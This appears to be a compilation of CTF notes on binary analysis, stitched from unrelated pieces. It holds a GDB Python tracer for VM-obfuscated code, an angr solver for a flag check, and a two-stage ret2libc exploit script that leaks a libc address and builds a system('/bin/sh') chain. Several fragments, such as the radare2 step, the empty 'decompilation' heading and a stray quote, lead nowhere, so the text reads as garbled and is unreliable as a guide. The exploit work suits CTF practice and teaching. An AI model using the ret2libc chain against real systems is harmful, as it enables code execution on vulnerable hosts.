Recently I've been working with GDB scripting. GDB exposes a Python API, so specific tasks can be automated by writing a script that drives the debugger for you; one example is a runtime tracer that records and disassembles the instructions a VM-obfuscated binary actually executes, which sidesteps static analysis of the obfuscated code. There are many plugins for GDB, such as peda, gef and pwndbg. GEF is a powerful plugin with many features, and the cheatsheet below covers how to use GEF's API for GDB scripting.
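As an added example (not code from the original post or from GEF), here is a plain GDB Python script of the kind described above: a `vmtrace` command single-steps the inferior and records every instruction through GDB's own disassembler, and `vmtrace-report` rebuilds the VM handler sequence from the trace. The command names, the dispatcher address in the usage comment, and the assumption that the dispatcher is a single indirect `jmp` whose successor is the handler entry are all assumptions for illustration.

```python
"""
vmtrace.py: runtime tracer for a VM-obfuscated binary (added example).

    (gdb) source vmtrace.py
    (gdb) break main
    (gdb) run
    (gdb) vmtrace 0x401136 20000   # dispatcher jmp address and max steps (hypothetical)
    (gdb) vmtrace-report
"""
import collections

# The gdb module exists only inside a running GDB; import it lazily so the
# pure helpers below can be imported and unit-tested outside the debugger.
try:
    import gdb
except ImportError:
    gdb = None

TRACE = []           # (pc, asm) records in execution order
DISPATCHER = [None]  # address of the dispatcher's indirect jump (set by vmtrace)


def handler_sequence(trace, dispatcher):
    """Return handler entry addresses in execution order.

    The dispatcher is hit once per VM instruction; the native instruction that
    executes right after its indirect jump is the handler entry.
    """
    handlers = []
    expect_handler = False
    for pc, _asm in trace:
        if pc == dispatcher:
            expect_handler = True
        elif expect_handler:
            handlers.append(pc)
            expect_handler = False
    return handlers


def mnemonic_histogram(trace):
    """Count mnemonics in the trace; hot indirect jumps hint at the dispatcher."""
    counts = collections.Counter()
    for _pc, asm in trace:
        parts = asm.split()
        counts[parts[0] if parts else ""] += 1
    return dict(counts)


if gdb is not None:

    def current_insn():
        """Disassemble the instruction at $pc with GDB's architecture API."""
        frame = gdb.selected_frame()
        pc = int(frame.pc())
        insn = frame.architecture().disassemble(pc)[0]
        return pc, insn["asm"]

    class VmTrace(gdb.Command):
        """vmtrace DISPATCHER [MAXSTEPS]: single-step, recording each instruction."""

        def __init__(self):
            super().__init__("vmtrace", gdb.COMMAND_USER)

        def invoke(self, arg, from_tty):
            argv = gdb.string_to_argv(arg)
            DISPATCHER[0] = int(gdb.parse_and_eval(argv[0]))
            max_steps = int(argv[1]) if len(argv) > 1 else 100000
            TRACE.clear()
            for _ in range(max_steps):
                try:
                    TRACE.append(current_insn())
                    gdb.execute("stepi", to_string=True)
                except gdb.error:  # inferior exited, no frame to read
                    break
            gdb.write("recorded %d instructions\n" % len(TRACE))

    class VmTraceReport(gdb.Command):
        """vmtrace-report: print the handler sequence and top mnemonics."""

        def __init__(self):
            super().__init__("vmtrace-report", gdb.COMMAND_USER)

        def invoke(self, arg, from_tty):
            seq = handler_sequence(TRACE, DISPATCHER[0])
            gdb.write("%d handler invocations\n" % len(seq))
            for pc in seq:
                gdb.write("  %#x\n" % pc)
            top = sorted(mnemonic_histogram(TRACE).items(),
                         key=lambda kv: -kv[1])[:10]
            for mnemonic, n in top:
                gdb.write("%8d %s\n" % (n, mnemonic))

    VmTrace()
    VmTraceReport()
```

Single-stepping with `stepi` is slow but needs no knowledge of the handler table; once the dispatcher is known from the histogram, the same script can be narrowed to a breakpoint on it.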
Author: ttlhacker. Challenge files. Description: x86_64 Linux binary (tested on Debian 9 and Ubuntu 18.04, should run on any distro). Takes one command line argument and outputs "OK!" if it's correct, "Wrong" if it's not. Partially written in C; the actual verification routine is assembly. Don't patch the binary, of course - find the correct input.
Let's open the binary in radare2 and look at the disassembly of the main function.
Leaking libc addresses to do ret2libc with an unknown libc
First let's take a look at the binary's mitigations:
checksec return-to-what
[*] '/home/h4x5p4c3/Downloads/ret2what/return-to-what'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
NX is enabled, so we can't just overflow the buffer and jump to shellcode placed on the stack; there is no stack canary, so overwriting the saved return address is straightforward; and the binary is not PIE, so its code, PLT and GOT sit at fixed addresses starting at 0x400000. ASLR is presumably enabled for libc, though, so we first have to leak a libc address, and since we don't know which libc the target runs, identify the version from that leak before computing system and "/bin/sh".
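The two-stage plan above, as an added example that is not the original post's exploit: stage one calls puts(puts@got) and returns to main, stage two resolves libc from the leak and calls system("/bin/sh"). The gadget, PLT/GOT and main addresses, the 40-byte offset to the return address and the candidate libc offset table are placeholders constructed for the example, not values taken from return-to-what. Identifying the libc uses the same trick as libc-database lookups: ASLR moves libc by whole pages, so the low 12 bits of a leaked symbol must match its offset in the library.

```python
"""ret2libc leak and libc identification for a non-PIE x86-64 binary (added example)."""
import struct

# --- assumed binary layout (hypothetical; normally from objdump/ROPgadget) ---
RET_OFFSET = 40          # bytes from the start of the buffer to the saved RIP
POP_RDI_RET = 0x4011bb   # pop rdi ; ret
RET_GADGET = 0x4011bc    # ret (second byte of the gadget above)
PUTS_PLT = 0x401030
PUTS_GOT = 0x404018
MAIN = 0x401136

# Constructed candidate table in the style of a libc database: symbol offsets
# relative to the library base. The values are made up for this example.
CANDIDATE_LIBCS = {
    "libc-A (constructed)": {"puts": 0x80520, "system": 0x4f420, "str_bin_sh": 0x1b3e9a},
    "libc-B (constructed)": {"puts": 0x875a0, "system": 0x55410, "str_bin_sh": 0x1b75aa},
}


def p64(value):
    return struct.pack("<Q", value)


def build_leak_chain():
    """Stage 1: puts(puts@got) prints the real address of puts, then return to
    main so the program overflows a second time with the leak in hand."""
    chain = p64(POP_RDI_RET) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)
    return b"A" * RET_OFFSET + chain


def parse_leak(line):
    """puts() writes the pointer bytes up to the first NUL, then '\\n'. A
    user-space x86-64 address has two leading zero bytes, so only 6 bytes come
    back and must be padded to 8 before unpacking."""
    raw = line.rstrip(b"\n")[:8]
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def identify_libc(leaked_puts, candidates=CANDIDATE_LIBCS):
    """Candidates whose puts offset agrees with the leak in the low 12 bits."""
    return [name for name, offs in candidates.items()
            if offs["puts"] & 0xfff == leaked_puts & 0xfff]


def resolve(leaked_puts, offsets):
    """Compute the libc base and the addresses needed for system("/bin/sh")."""
    base = leaked_puts - offsets["puts"]
    if base & 0xfff:
        raise ValueError("libc base %#x is not page aligned; wrong libc?" % base)
    return {"base": base,
            "system": base + offsets["system"],
            "bin_sh": base + offsets["str_bin_sh"]}


def build_system_chain(resolved):
    """Stage 2: system("/bin/sh"). The leading 'ret' keeps the stack 16-byte
    aligned when system() is entered, which recent glibc requires (it uses
    movaps on the stack and faults otherwise)."""
    chain = (p64(RET_GADGET) + p64(POP_RDI_RET) + p64(resolved["bin_sh"])
             + p64(resolved["system"]))
    return b"A" * RET_OFFSET + chain


def plan_exploit(leak_line):
    """Given the line the target printed after stage 1, return the identified
    libc, the resolved addresses and the stage 2 payload."""
    leaked = parse_leak(leak_line)
    matches = identify_libc(leaked)
    if len(matches) != 1:
        raise ValueError("ambiguous or unknown libc: %r" % matches)
    resolved = resolve(leaked, CANDIDATE_LIBCS[matches[0]])
    return matches[0], resolved, build_system_chain(resolved)
```

With a real database several libcs usually share the low 12 bits of one symbol; leaking a second function (for example printf@got as well as puts@got in the same chain) and matching both narrows the list to one.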
Decompilation and Disassembly. The decompilation of the assembly code looks like this:
Failures aren't the stepping stones to success; they're just stones. You're the one who decides to step on them. - jones
Analysis. This is a simple reversing challenge: we need to find the correct flag. The binary has two outcomes: it prints SUCCESS if the correct flag is passed and FAILURE if it is wrong. We can solve this fairly easily with angr by executing the binary symbolically and asking the solver for an input that reaches the SUCCESS path while avoiding the FAILURE one.
Decompilation. Looking at the decompilation, we see a string comparison which shows that the string we're looking for is 16 characters long.
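Putting the SUCCESS/FAILURE analysis and the 16-character length together, here is an added angr solver (not the original post's script). The binary path `./chall` is an assumption; the argument length comes from the comparison above. The flag is passed as a symbolic argv[1], constrained to printable ASCII so the solver does not return unusable bytes, and the explore step keys on the program's own output rather than on hard-coded addresses.

```python
"""angr find/avoid solver for a SUCCESS/FAILURE check (added example)."""
try:
    import angr
    import claripy
except ImportError:  # let the pure helper be imported where angr is absent
    angr = claripy = None

FLAG_LEN = 16        # length seen in the string comparison in the decompilation
SUCCESS = b"SUCCESS"
FAILURE = b"FAILURE"


def decode_solution(raw):
    """Strip the NUL padding of a fixed-size buffer and check that the solver
    honoured the printable-ASCII constraint before returning the flag text."""
    text = raw.rstrip(b"\x00")
    if not text or any(b < 0x20 or b > 0x7e for b in text):
        raise ValueError("solver returned non-printable bytes: %r" % raw)
    return text.decode("ascii")


def solve(binary="./chall", flag_len=FLAG_LEN):
    """Return the argv[1] that makes the binary print SUCCESS, or None."""
    if angr is None:
        raise RuntimeError("angr is not installed")
    proj = angr.Project(binary, auto_load_libs=False)
    flag = claripy.BVS("flag", 8 * flag_len)
    # argv[1] is fully symbolic; angr NUL-terminates the argument itself.
    state = proj.factory.entry_state(args=[binary, flag])
    for i in range(flag_len):
        byte = flag.get_byte(i)
        state.solver.add(byte >= 0x20, byte <= 0x7e)
    simgr = proj.factory.simulation_manager(state)
    # Key on what the program prints instead of on addresses, so the script
    # survives a recompile of the challenge.
    simgr.explore(find=lambda s: SUCCESS in s.posix.dumps(1),
                  avoid=lambda s: FAILURE in s.posix.dumps(1))
    if not simgr.found:
        return None
    found = simgr.found[0]
    return decode_solution(found.solver.eval(flag, cast_to=bytes))


if __name__ == "__main__":
    print(solve())
```

If the comparison is a byte-by-byte loop rather than a library call, path explosion is the usual failure mode; `auto_load_libs=False` keeps libc calls as SimProcedures, and the `avoid` predicate prunes the FAILURE branches early.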